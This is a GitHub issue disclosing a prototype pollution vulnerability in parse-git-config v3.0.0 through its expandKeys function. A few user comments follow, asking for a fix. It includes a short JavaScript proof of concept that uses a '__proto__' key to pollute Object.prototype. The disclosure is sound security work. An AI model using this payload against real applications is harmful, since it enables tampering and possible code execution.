Skip to content

Prototype Pollution Vulneralbility in parse-git-config v3.0.0 #14

Description

@Ducky97

Affected Package:

parse-git-config v3.0.0

Vulnerability Location(s):

https://github.com/jonschlinkert/parse-git-config/blob/master/index.js#L134

Description:

The latest version of parse-git-config (3.0.0) is vulnerable to Prototype Pollution through the entry function expandKeys. An attacker can supply a payload with a prop and m[2] to introduce or modify properties within the global prototype chain.
The consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library is integrated within the application. For example, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

(async () => {
  var victim = {};
  const parseGitConfig = require('parse-git-config');
  console.log("Before Attack: ", {}.isPolluted); // undefined

  let config = {
    '__proto__ "isPolluted"': true
  };
  parseGitConfig.expandKeys(config);

  console.log("After Attack: ", {}.isPolluted); //  true
})();

Activity

  1. changed the title [-]Prototype Pollution Vulneralbility in xregexp v3.0.0[/-] [+]Prototype Pollution Vulneralbility in parse-git-config v3.0.0[/+] on Jan 26, 2025
  2. thomashohn commented on Mar 17, 2025

    @thomashohn

    @jonschlinkert any chance that this issue could be fixed og @Ducky97 could you provide a PR for a fix?

  3. minoo221 commented on Jul 20, 2026

    @minoo221

    Anything new? Versions ist still 3.0.0 with vulneraibikity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions